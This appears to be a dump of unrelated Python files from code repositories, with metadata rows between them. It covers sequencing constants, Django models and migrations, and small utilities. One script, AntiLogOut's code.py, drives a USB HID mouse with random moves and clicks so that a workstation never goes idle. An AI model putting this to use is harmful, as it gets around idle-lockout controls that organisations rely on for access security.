PLATFORMS = (LS454, ILLUMINA, PACBIO_SMRT, IONTORRENT, CAPILLARY, ONT, BGISEQ, DNBSEQ)
# Constants for platforms.
LS454_454GS = "454 GS"
LS454_454GS_240 = "454 GS 20"
LS454_454GS_FLX = "454 GS FLX"
LS454_454GS_FLX_PLUS = "454 GS FLX+"
LS454_454GS_FLX_TITANIUM = "454 GS FLX Titanium"
LS454_454GS_JUNIOR = "454 GS Junior"
ILLUMINA_HISEQX_FIVE = "HiSeq X Five"
ILLUMINA_HISEQX_TEN = "HiSeq X Ten"
ILLUMINA_GA = "Illumina Genome Analyzer"
ILLUMINA_GA2 = "Illumina Genome Analyzer II"
ILLUMINA_GA2x = "Illumina Genome Analyzer IIx"
ILLUMINA_HISCANQ = "Illumina HiScanSQ"
ILLUMINA_HISEQ_1000 = "Illumina HiSeq 1000"
ILLUMINA_HISEQ_1500 = "Illumina HiSeq 1500"
ILLUMINA_HISEQ_2000 = "Illumina HiSeq 2000"
ILLUMINA_HISEQ_2500 = "Illumina HiSeq 2500"
ILLUMINA_HISEQ_3000 = "Illumina HiSeq 3000"
ILLUMINA_HISEQ_4000 = "Illumina HiSeq 4000"
ILLUMINA_ISEQ_100 = "Illumina iSeq 100"
ILLUMINA_MISEQ = "Illumina MiSeq"
ILLUMINA_MINISEQ = "Illumina MiniSeq"
ILLUMINA_NOVASEQ_6000 = "Illumina NovaSeq 6000"
ILLUMINA_NETSEQ_500 = "NextSeq 500"
ILLUMINA_NETSEQ_550 = "NextSeq 550"
PACBIO_RS = "PacBio RS"
PACBIO_RS2 = "PacBio RS II"
PACBIO_SEQEL = "Sequel"
IONTORRENT_PGM = "Ion Torrent PGM"
IONTORRENT_PROTON = "Ion Torrent Proton"
IONTORRENT_S5 = "Ion Torrent S5"
IONTORRENT_S5XL = "Ion Torrent S5 XL"
ABI_AB3730XL = "AB 3730xL Genetic Analyzer"
ABI_AB3730 = "AB 3730 Genetic Analyzer"
ABI_AB3500XL = "AB 3500xL Genetic Analyzer"
ABI_AB3500 = "AB 3500 Genetic Analyzer"
ABI_AB3130XL = "AB 3130xL Genetic Analyzer"
ABI_AB3130 = "AB 3130 Genetic Analyzer"
ABI_AB310 = "AB 310 Genetic Analyzer"
ONT_MINION = "MinION"
ONT_GRIDION = "GridION"
ONT_PROMETHION = "PromethION"
BGI_BGISEQ500 = "BGISEQ-500"
DNB_T7 = "DNBSEQ-T7"
DNB_G400 = "DNBSEQ-G400"
DNB_G50 = "DNBSEQ-G50"
DNB_G400_FAST = "DNBSEQ-G400 FAST"
UNSPECIFIED = "unspecified"
#: Allowed values for instruments in ENA records.
INSTRUMENTS = (
LS454_454GS,
LS454_454GS_240,
LS454_454GS_FLX,
LS454_454GS_FLX_PLUS,
LS454_454GS_FLX_TITANIUM,
LS454_454GS_JUNIOR,
ILLUMINA_HISEQX_FIVE,
ILLUMINA_HISEQX_TEN,
ILLUMINA_GA,
ILLUMINA_GA2,
ILLUMINA_GA2x,
ILLUMINA_HISCANQ,
ILLUMINA_HISEQ_1000,
ILLUMINA_HISEQ_1500,
ILLUMINA_HISEQ_2000,
ILLUMINA_HISEQ_2500,
ILLUMINA_HISEQ_3000,
ILLUMINA_HISEQ_4000,
ILLUMINA_ISEQ_100,
ILLUMINA_MISEQ,
ILLUMINA_MINISEQ,
ILLUMINA_NOVASEQ_6000,
ILLUMINA_NETSEQ_500,
ILLUMINA_NETSEQ_550,
PACBIO_RS,
PACBIO_RS2,
PACBIO_SEQEL,
IONTORRENT_PGM,
IONTORRENT_PROTON,
IONTORRENT_S5,
IONTORRENT_S5XL,
ABI_AB3730XL,
ABI_AB3730,
ABI_AB3500XL,
ABI_AB3500,
ABI_AB3130XL,
ABI_AB3130,
ABI_AB310,
ONT_MINION,
ONT_GRIDION,
ONT_PROMETHION,
BGI_BGISEQ500,
DNB_T7,
DNB_G400,
DNB_G50,
DNB_G400_FAST,
UNSPECIFIED,
)
# Constants for library selection.
LIBSEL_RANDOM = "RANDOM"
LIBSEL_PCR = "PCR"
LIBSEL_RANDOM_PCR = "RANDOM PCR"
LIBSEL_RT_PCR = "RT-PCR"
LIBSEL_HMPR = "HMPR"
LIBSEL_MF = "MF"
LIBSEL_REPEAT_FRACTIONATION = "repeat fractionation"
LIBSEL_SIZE_FRACTIONATION = "size fractionation"
LIBSEL_MSLL = "MSLL"
LIBSEL_CDNA = "cDNA"
LIBSEL_CDNA_RANDOM_PRIMING = "cDNA_randomPriming"
LIBSEL_CDNA_OLIGO_DT = "cDNA_oligo_dT"
LIBSEL_POLYA = "PolyA"
LIBSEL_OLIGO_DT = "Oligo-dT"
LIBSEL_INVERSE_RNA = "Inverse rRNA"
LIBSEL_INVERSE_RNA_SELECTION = "Inverse rRNA selection"
LIBSEL_CHIP = "ChIP"
LIBSEL_CHIP_SEQ = "ChIP-Seq"
LIBSEL_MNASE = "MNase"
LIBSEL_DNASE = "DNase"
LIBSEL_HYBRID_SELECTION = "Hybrid Selection"
LIBSEL_REDUCED_REPRESENTATION = "Reduced Representation"
LIBSEL_RESTRICTION_DIGEST = "Restriction Digest"
LIBSEL_5HETYHLCYTITINE_ANTIBODY = "5-methylcytidine antibody"
LIBSEL_MBD2_PROTEIN_METHYL_CPG_BINDING_DOMAIN = "MBD2 protein methyl-CpG binding domain"
LIBSEL_CAGE = "CAGE"
LIBSEL_RACE = "RACE"
LIBSEL_MDA = "MDA"
LIBSEL_PADLOCK_PROBES_CPATURE_METHOD = "padlock probes capture method"
LIBSEL_OTHER = "other"
LIBSEL_UNSPECIFIED = "unspecified"
#: Allowed library selection strategies for ENA records.
LIBRARY_SELECTIONS = (
LIBSEL_RANDOM,
LIBSEL_PCR,
LIBSEL_RANDOM_PCR,
LIBSEL_RT_PCR,
LIBSEL_HMPR,
LIBSEL_MF,
LIBSEL_REPEAT_FRACTIONATION,
LIBSEL_SIZE_FRACTIONATION,
LIBSEL_MSLL,
LIBSEL_CDNA,
LIBSEL_CDNA_RANDOM_PRIMING,
LIBSEL_CDNA_OLIGO_DT,
LIBSEL_POLYA,
LIBSEL_OLIGO_DT,
LIBSEL_INVERSE_RNA,
LIBSEL_INVERSE_RNA_SELECTION,
LIBSEL_CHIP,
LIBSEL_CHIP_SEQ,
LIBSEL_MNASE,
LIBSEL_DNASE,
LIBSEL_HYBRID_SELECTION,
LIBSEL_REDUCED_REPRESENTATION,
LIBSEL_RESTRICTION_DIGEST,
LIBSEL_5HETYHLCYTITINE_ANTIBODY,
LIBSEL_MBD2_PROTEIN_METHYL_CPG_BINDING_DOMAIN,
LIBSEL_CAGE,
LIBSEL_RACE,
LIBSEL_MDA,
LIBSEL_PADLOCK_PROBES_CPATURE_METHOD,
LIBSEL_OTHER,
LIBSEL_UNSPECIFIED,
)
# Constants for library sources.
LIBSRC_GENOMIC = "GENOMIC"
LIBSRC_GENOMIC_SC = "GENOMIC SINGLE CELL"
LIBSRC_TRANSCRIPTOMIC = "TRANSCRIPTOMIC"
LIBSRC_TRANSCRIPTOMIC_SC = "TRANSCRIPTOMIC SINGLE CELL"
LIBSRC_METAGENOMIC = "METAGENOMIC"
LIBSRC_METATRANSCRIPTOMIC = "METATRANSCRIPTOMIC"
LIBSRC_SYNTHETIC = "SYNTHETIC"
LIBSRC_VIRAL_RNA = "VIRAL RNA"
LIBSRC_OTHER = "OTHER"
#: Allowed library sources for ENA records.
LIBRARY_SOURCES = (
LIBSRC_GENOMIC,
LIBSRC_GENOMIC_SC,
LIBSRC_TRANSCRIPTOMIC,
LIBSRC_TRANSCRIPTOMIC_SC,
LIBSRC_METAGENOMIC,
LIBSRC_METATRANSCRIPTOMIC,
LIBSRC_SYNTHETIC,
LIBSRC_VIRAL_RNA,
LIBSRC_OTHER,
)
# Constants for library strategies.
LIBSTR_WGS = "WGS"
LIBSTR_WGA = "WGA"
LIBSTR_WXS = "WXS"
LIBSTR_RNA_SEQ = "RNA-Seq"
LIBSTR_SSRNA_SEQ = "ssRNA-seq"
LIBSTR_MIRNA_SEQ = "miRNA-Seq"
LIBSTR_NCRNA_SEQ = "ncRNA-Seq"
LIBSTR_FL_CDNA = "FL-cDNA"
LIBSTR_EST = "EST"
LIBSTR_HIC = "Hi-C"
LIBSTR_ATAC_SEQ = "ATAC-seq"
LIBSTR_WCS = "WCS"
LIBSTR_RAD_SEQ = "RAD-Seq"
LIBSTR_CLONE = "CLONE"
LIBSTR_POOLCLONE = "POOLCLONE"
LIBSTR_AMPLICON = "AMPLICON"
LIBSTR_CLONEEND = "CLONEEND"
LIBSTR_FINISHING = "FINISHING"
LIBSTR_CHIP_SEQ = "ChIP-Seq"
LIBSTR_MNASE_EQ = "MNase-Seq"
LIBSTR_DNASE_HYPERSENSITIVITY = "DNase-Hypersensitivity"
LIBSTR_BISULFITE_SEQ = "Bisulfite-Seq"
LIBSTR_CTS = "CTS"
LIBSTR_MRE_SEQ = "MRE-Seq"
LIBSTR_MEDIP_SEQ = "MeDIP-Seq"
LIBSTR_MBD_SEQ = "MBD-Seq"
LIBSTR_TN_SEQ = "Tn-Seq"
LIBSTR_VALIDATION = "VALIDATION"
LIBSTR_FAIRE_SEQ = "FAIRE-seq"
LIBSTR_SELEX = "SELEX"
LIBSTR_RIP_SEQ = "RIP-Seq"
LIBSTR_CHIA_PET = "ChIA-PET"
LIBSTR_SYNTHEETIC_LONG_READ = "Synthetic-Long-Read"
LIBSTR_TARGETED_CAPTURE = "Targeted-Capture"
LIBSTR_TETHERED_CHROMATIN_CONFORMATION_CAPTURE = "Tethered Chromatin Conformation Capture"
LIBSTR_OTHER = "OTHER"
#: Allowed library strategies for ENA records.
LIBRARY_STRATEGIES = (
LIBSTR_WGS,
LIBSTR_WGA,
LIBSTR_WXS,
LIBSTR_RNA_SEQ,
LIBSTR_SSRNA_SEQ,
LIBSTR_MIRNA_SEQ,
LIBSTR_NCRNA_SEQ,
LIBSTR_FL_CDNA,
LIBSTR_EST,
LIBSTR_HIC,
LIBSTR_ATAC_SEQ,
LIBSTR_WCS,
LIBSTR_RAD_SEQ,
LIBSTR_CLONE,
LIBSTR_POOLCLONE,
LIBSTR_AMPLICON,
LIBSTR_CLONEEND,
LIBSTR_FINISHING,
LIBSTR_CHIP_SEQ,
LIBSTR_MNASE_EQ,
LIBSTR_DNASE_HYPERSENSITIVITY,
LIBSTR_BISULFITE_SEQ,
LIBSTR_CTS,
LIBSTR_MRE_SEQ,
LIBSTR_MEDIP_SEQ,
LIBSTR_MBD_SEQ,
LIBSTR_TN_SEQ,
LIBSTR_VALIDATION,
LIBSTR_FAIRE_SEQ,
LIBSTR_SELEX,
LIBSTR_RIP_SEQ,
LIBSTR_CHIA_PET,
LIBSTR_SYNTHEETIC_LONG_READ,
LIBSTR_TARGETED_CAPTURE,
LIBSTR_TETHERED_CHROMATIN_CONFORMATION_CAPTURE,
LIBSTR_OTHER,
)
| 27.59661
| 91
| 0.737624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,401
| 0.294927
|
49c885495b8b9d85f2a2df00b05e024d355e6e0a
| 1,463
|
py
|
Python
|
analytics/utils.py
|
educreations/py-analytics
|
abbc814925c6cc200b3329c7de9f1868e1cb8c01
|
[
"Apache-2.0"
] | 10
|
2015-01-25T20:29:55.000Z
|
2020-12-08T21:35:09.000Z
|
analytics/utils.py
|
educreations/py-analytics
|
abbc814925c6cc200b3329c7de9f1868e1cb8c01
|
[
"Apache-2.0"
] | 3
|
2018-05-15T06:28:20.000Z
|
2021-03-30T17:47:45.000Z
|
analytics/utils.py
|
educreations/py-analytics
|
abbc814925c6cc200b3329c7de9f1868e1cb8c01
|
[
"Apache-2.0"
] | 6
|
2017-07-03T16:28:29.000Z
|
2020-06-15T19:10:45.000Z
|
"""
Copyright 2012 Numan Sachwani <numan@7Geese.com>
This file is provided to you under the Apache License,
Version 2.0 (the "License"); you may not use this file
except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
# import_string comes form Werkzeug
# http://werkzeug.pocoo.org
def import_string(import_name, silent=False):
"""Imports an object based on a string. If *silent* is True the return
value will be None if the import fails.
Simplified version of the function with same name from `Werkzeug`_.
:param import_name:
The dotted name for the object to import.
:param silent:
If True, import errors are ignored and None is returned instead.
:returns:
The imported object.
"""
import_name = str(import_name)
try:
if '.' in import_name:
module, obj = import_name.rsplit('.', 1)
return getattr(__import__(module, None, None, [obj]), obj)
else:
return __import__(import_name)
except (ImportError, AttributeError):
if not silent:
raise
| 32.511111
| 74
| 0.699932
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,074
| 0.734108
|
49c8b96abc3f198aa66587406ab8b7e9c78fd259
| 31
|
py
|
Python
|
lemkelcp/__init__.py
|
pritam-dey3/lemkelcp
|
4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e
|
[
"MIT"
] | 10
|
2019-03-17T19:37:25.000Z
|
2022-01-02T04:29:05.000Z
|
lemkelcp/__init__.py
|
pritam-dey3/lemkelcp
|
4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e
|
[
"MIT"
] | 1
|
2019-09-25T09:32:49.000Z
|
2021-12-28T05:05:55.000Z
|
lemkelcp/__init__.py
|
pritam-dey3/lemkelcp
|
4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e
|
[
"MIT"
] | 4
|
2019-02-24T11:49:10.000Z
|
2020-06-06T14:07:11.000Z
|
from .lemkelcp import lemkelcp
| 15.5
| 30
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
49c93ee339debd703889e1a8187ecdfd356689ca
| 1,999
|
py
|
Python
|
settings.py
|
ArneBinder/Pytorch-LRP
|
c17902138f1d560f1f5d38f401ac856e071a5800
|
[
"BSD-3-Clause"
] | 117
|
2019-03-19T08:47:03.000Z
|
2022-03-31T04:14:51.000Z
|
settings.py
|
ArneBinder/Pytorch-LRP
|
c17902138f1d560f1f5d38f401ac856e071a5800
|
[
"BSD-3-Clause"
] | 10
|
2019-09-15T14:59:43.000Z
|
2022-03-15T14:18:02.000Z
|
settings.py
|
ArneBinder/Pytorch-LRP
|
c17902138f1d560f1f5d38f401ac856e071a5800
|
[
"BSD-3-Clause"
] | 49
|
2019-03-19T08:47:03.000Z
|
2021-11-30T01:02:04.000Z
|
"""
Settings for re-running the experiments from the paper "Layer-wise
relevance propagation for explaining deep neural network decisions
in MRI-based Alzheimer’s disease classification".
Please note that you need to download the ADNI data from
http://adni.loni.usc.edu/ and preprocess it using
https://github.com/ANTsX/ANTs/blob/master/Scripts/antsRegistrationSyNQuick.sh
Please prepare the data, such that you will get three HDF5 files,
consisting of a training, a validation and a holdout (test) set.
Each HDF5 file is required to have 2 datasets, namely X and y,
containing the data matrix and label vector accordingly. We have
included the "Data Split ADNI.ipynb" file as a guideline for data splitting.
Please note that it is highly dependent on the format of your data storage
and needs to be individualized as such.
Furthermore you will need SPM12 https://www.fil.ion.ucl.ac.uk/spm/software/spm12/
in order to access the Neuromorphometrics atlas.
Arguments:
model_path: Path to the trained pytorch model parameters
data_path: Path where the outputs will be stored and retrieved
ADNI_DIR: Path to the root of your downloaded ADNI data
train_h5: Path to the training set HDF5 file
val_h5: Path to the validation set HDF5 file
holdout_h5: Path to the holdout set HDF5 file
binary_brain_mask: Path to the mask used for masking the images,
included in the repository.
nmm_mask_path: Path to the Neuromorphometrics mask. Needs to be
acquired from SPM12. Typically located under
~/spm12/tpm/labels_Neuromorphometrics.nii
nmm_mask_path_scaled: Path to the rescaled Neuromorphometrics mask.
"""
settings = {
"model_path": INSERT,
"data_path": INSERT,
"ADNI_DIR": INSERT,
"train_h5": INSERT,
"val_h5": INSERT,
"holdout_h5": INSERT,
"binary_brain_mask": "binary_brain_mask.nii.gz",
"nmm_mask_path": "~/spm12/tpm/labels_Neuromorphometrics.nii",
"nmm_mask_path_scaled": "nmm_mask_rescaled.nii"
}
| 40.795918
| 81
| 0.758379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,876
| 0.937531
|
49ca8eabe12b4dbe3823135f9cccd4003e5ec8f9
| 274
|
py
|
Python
|
compiler_test.py
|
zpcore/ACOW
|
9d9186eb28af3e5e1242621457f36d5a7910366a
|
[
"MIT"
] | null | null | null |
compiler_test.py
|
zpcore/ACOW
|
9d9186eb28af3e5e1242621457f36d5a7910366a
|
[
"MIT"
] | null | null | null |
compiler_test.py
|
zpcore/ACOW
|
9d9186eb28af3e5e1242621457f36d5a7910366a
|
[
"MIT"
] | null | null | null |
'''
# Test the compiler
'''
from ACOW import *
data = '''
a1 U[1,2] !a0&G[1,3]a3
'''
print('MTL Formula:',data)
# Test lex
print('\nLex Test:')
lexer.input(data)
for tok in lexer:
print(tok)
# Test parser
print('\nParser Test:')
result = parser.parse(data)
print(result)
| 13.7
| 27
| 0.645985
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 123
| 0.448905
|
49caba94d9ddd16a821b2ba8d9ea2e815b9e25e0
| 1,292
|
py
|
Python
|
code.py
|
RanaTe/AntiLogOut
|
0d970f6202fb16be469de6a98c45c0cfb4b910f0
|
[
"OML"
] | null | null | null |
code.py
|
RanaTe/AntiLogOut
|
0d970f6202fb16be469de6a98c45c0cfb4b910f0
|
[
"OML"
] | null | null | null |
code.py
|
RanaTe/AntiLogOut
|
0d970f6202fb16be469de6a98c45c0cfb4b910f0
|
[
"OML"
] | null | null | null |
import board
import time
import random
import usb_hid
from adafruit_hid.mouse import Mouse
from adafruit_hid.keyboard import Keyboard
mouse = Mouse(usb_hid.devices)
goright=True
while True:
#2 parts to sequence, move mostly right, then mostly left
# set up for big move
#longwait=random.randint(250,350)
longwait=random.randint(2,3)
bigoffsetx=random.randint(-10,10)
bigoffsety=random.randint(-7,7)
# do 1st big move
if goright:
# do a right move
print("moving right")
mouse.move(100+bigoffsetx,bigoffsety)
goright=False
else:
# do a left move
print("moving left")
mouse.move(-100+bigoffsetx,bigoffsety)
goright=True
# do some quick clicks and moves
numberofclicks=random.randint(3,6)
print("doing some clicks")
for ismall in range(1,numberofclicks):
#shortwait in ms (double click is usually less than 500ms)
shortwait=0.001*random.randint(250,600)
#print(shortwait)
shortmovex=random.randint(-9,9)
shortmovey=random.randint(-7,7)
#move, wait, click
mouse.move(shortmovex,shortmovey)
time.sleep(shortwait)
mouse.click(Mouse.LEFT_BUTTON)
time.sleep(longwait)
print("waiting for next move")
| 25.84
| 66
| 0.666409
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 361
| 0.279412
|
49cc558662f5dd7e7fb056fd6f79d57effb78d66
| 315
|
py
|
Python
|
insta/admin.py
|
Stephenremmi/insta-clone
|
88af361dca160f7840842ebebc306a02f97920ca
|
[
"MIT"
] | null | null | null |
insta/admin.py
|
Stephenremmi/insta-clone
|
88af361dca160f7840842ebebc306a02f97920ca
|
[
"MIT"
] | 3
|
2021-03-30T13:54:34.000Z
|
2021-09-08T02:17:46.000Z
|
insta/admin.py
|
Stephenremmi/insta-clone
|
88af361dca160f7840842ebebc306a02f97920ca
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Post, Comment, UserProfile
class ProfileAdmin(admin.ModelAdmin):
filter_horizontal =("followers", "following",)
# Register your models here.
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(UserProfile, admin_class=ProfileAdmin)
| 26.25
| 58
| 0.796825
| 88
| 0.279365
| 0
| 0
| 0
| 0
| 0
| 0
| 50
| 0.15873
|
49cd3c2fd0bbd8a92289c21bd54ca7e440919719
| 25,042
|
py
|
Python
|
travelling/migrations/0001_initial.py
|
HerbyDE/jagdreisencheck-webapp
|
9af5deda2423b787da88a0c893f3c474d8e4f73f
|
[
"BSD-3-Clause"
] | null | null | null |
travelling/migrations/0001_initial.py
|
HerbyDE/jagdreisencheck-webapp
|
9af5deda2423b787da88a0c893f3c474d8e4f73f
|
[
"BSD-3-Clause"
] | null | null | null |
travelling/migrations/0001_initial.py
|
HerbyDE/jagdreisencheck-webapp
|
9af5deda2423b787da88a0c893f3c474d8e4f73f
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-27 14:43
from __future__ import unicode_literals
import ckeditor.fields
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django_countries.fields
import jagdreisencheck.custom_fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0006_auto_20181121_2205'),
('cms', '0020_old_tree_cleanup'),
]
operations = [
migrations.CreateModel(
name='AccommodationPrice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('acc_type', models.CharField(choices=[('S', 'Self Organized'), ('C', 'Camping Sight'), ('B', 'Bungalow/Simple Accomodation'), ('BB', 'Bed & Breakfast'), ('H', 'Hotel')], max_length=2, null=True, verbose_name='Accommodation')),
('price_hunter', models.FloatField(null=True, verbose_name='Price per hunter')),
('price_non_hunter', models.FloatField(null=True, verbose_name='Price per accompanying person')),
('calc_base', models.CharField(choices=[('DAY', 'Per day')], max_length=3, null=True, verbose_name='Calculation base')),
],
),
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=150, unique=True, verbose_name='Name')),
('pub_date', models.DateTimeField(auto_now_add=True, verbose_name='Date of Creation')),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Creator')),
],
options={
'verbose_name': 'Game',
'verbose_name_plural': 'Games',
},
),
migrations.CreateModel(
name='GamePrice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(blank=True, max_length=75, null=True, verbose_name='Gender/Type')),
('calc_base', models.CharField(choices=[('CIC', 'CIC points'), ('PCS', 'Pieces'), ('KGS', 'Per kg'), ('AGE', 'Age class')], max_length=3, null=True, verbose_name='Calculation base')),
('base_range', models.CharField(max_length=20, null=True, verbose_name='Range')),
('trophy_costs', models.FloatField(null=True, verbose_name='Trophy costs')),
('wounded_costs', models.FloatField(null=True, verbose_name='Wounded but not found - costs')),
('private_notes', models.TextField(blank=True, null=True, verbose_name='Private notes')),
('public_notes', models.TextField(blank=True, null=True, verbose_name='Public notes')),
('game', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='travelling.Game', verbose_name='Game')),
],
),
migrations.CreateModel(
name='PriceList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('last_modified', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Last modified')),
],
),
migrations.CreateModel(
name='Rating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language', models.CharField(max_length=6, null=True, verbose_name='Language')),
('date_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Creation Date')),
('last_modified', models.DateTimeField(blank=True, null=True, verbose_name='Last Modified')),
('agree_to_rules_of_contribution', models.BooleanField(default=False, verbose_name='Agree to Rules of Contribution')),
('name', models.CharField(max_length=90, null=True, verbose_name='Title')),
('description', models.TextField(blank=True, max_length=3000, null=True, verbose_name='Detailed Trip Description')),
('nps_indication', models.PositiveIntegerField(choices=[(1, 'No recommendation'), (2, 'Rather no recommendation'), (3, 'Indifferent'), (4, 'Recommendation'), (5, 'Definite recommendation')], default=3, null=True, verbose_name='Would you recommend the trip?')),
('trophies', django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True, verbose_name='Trophies')),
('meal_option', models.CharField(choices=[('N', 'No Meals Included'), ('B', 'Breakfast Included'), ('H', 'Breakfast & Dinner Included'), ('A', 'All Inclusive')], max_length=2, null=True, verbose_name='Catering Option')),
('meal_quality', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Catering Quality')),
('accommodation_type', models.CharField(choices=[('S', 'Self Organized'), ('C', 'Camping Sight'), ('B', 'Bungalow/Simple Accomodation'), ('BB', 'Bed & Breakfast'), ('H', 'Hotel')], default='S', max_length=2, null=True, verbose_name='Accommodation Type')),
('accommodation_rating', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Accommodation Rating')),
('support_with_issues', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Operator Support with Issues')),
('price_utility', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Price/Utility')),
('use_of_dogs', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Did you make use of dogs?')),
('dog_purpose', models.CharField(blank=True, choices=[('NO', 'No Dogs were needed'), ('NH', 'Chasing Dogs'), ('DR', 'Joint Hunt'), ('PI', 'Deerstalking Support')], max_length=3, null=True, verbose_name='What did you use the dogs for?')),
('dog_quality', models.IntegerField(blank=True, choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Quality of dogs')),
('game_density', models.IntegerField(choices=[(1, 'Too sparse'), (3, 'Rather too sparse'), (5, 'Optimal density'), (3, 'Rather too dense'), (1, 'Too dense')], null=True, verbose_name='How dense was the wildlife?')),
('game_age_dist', models.IntegerField(choices=[(1, 'Too young'), (3, 'Rather too young'), (5, 'Optimal'), (3, 'Rather too old'), (1, 'Too old'), (0, 'Unknown')], null=True, verbose_name="How was the wildlife's age distributed?")),
('game_gender_dist', models.IntegerField(choices=[(1, 'Predominantly female game'), (3, 'Slight overweight of female game'), (5, 'Good gender distribution'), (3, 'Slight overweight of male game'), (1, 'Predominantly male game'), (0, 'Unknown')], null=True, verbose_name="How did you experience the wildlife's gender distribution?")),
('hunt_in_wilderness', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Did you hunt in the wilderness?')),
('check_strike_pos', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Was the strike position of your rifle checked?')),
('check_hunt_license', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Was your hunting license validated?')),
('professional_hunter_quality', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Quality of the professional hunter')),
('customer_support', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Customer Support')),
('hunting_introduction', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Introduction to local hunting conditions')),
('staff_languages', jagdreisencheck.custom_fields.ListField(null=True, verbose_name='Languages spoken at the hunting site')),
('communication_quality', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Communication between staff and yourself')),
('alternative_program', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Did you make use of alternative program')),
('quality_alternative_program', models.IntegerField(blank=True, choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Quality of the alternative program')),
('economic_rating', models.DecimalField(decimal_places=4, max_digits=5, null=True, verbose_name='Economic Rating')),
('ecologic_rating', models.DecimalField(decimal_places=4, max_digits=5, null=True, verbose_name='Ecologic Rating')),
('social_rating', models.DecimalField(decimal_places=4, max_digits=5, null=True, verbose_name='Socio-Cultural Rating')),
('overall_rating', models.DecimalField(decimal_places=4, max_digits=5, null=True, verbose_name='Total Rating')),
],
),
migrations.CreateModel(
name='TravelInquiry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=150, null=True, verbose_name='Name')),
('email', models.EmailField(max_length=254, null=True, verbose_name='E-Mail')),
('kind_of_inquiry', models.CharField(choices=[('S', 'Solo Travel'), ('HG', 'Group Travel (Only Hunters)'), ('MG', 'Group Travel (Hunters/Non-Hunters)'), ('OT', 'Other')], max_length=2, null=True, verbose_name='Kind of Inquiry')),
('inquiry', ckeditor.fields.RichTextField(null=True, verbose_name='Travel Inquiry')),
('consent_to_be_contacted', models.BooleanField(default=False, verbose_name='Consent to be contacted')),
('date', models.DateTimeField(auto_now_add=True, verbose_name='Date of Inquiry')),
('status', models.BooleanField(default=True, verbose_name='Status')),
],
),
migrations.CreateModel(
name='Trip',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('consent_to_travel_rules', models.BooleanField(default=False, verbose_name='Consent to Publishing Rules')),
('name', models.CharField(blank=True, max_length=150, null=True, verbose_name='Name')),
('country', django_countries.fields.CountryField(max_length=2, verbose_name='Country')),
('region', models.CharField(max_length=300, verbose_name='Region / Territory')),
('available_accommodation_types', jagdreisencheck.custom_fields.ListField(blank=True, null=True, verbose_name='Available Accommodations')),
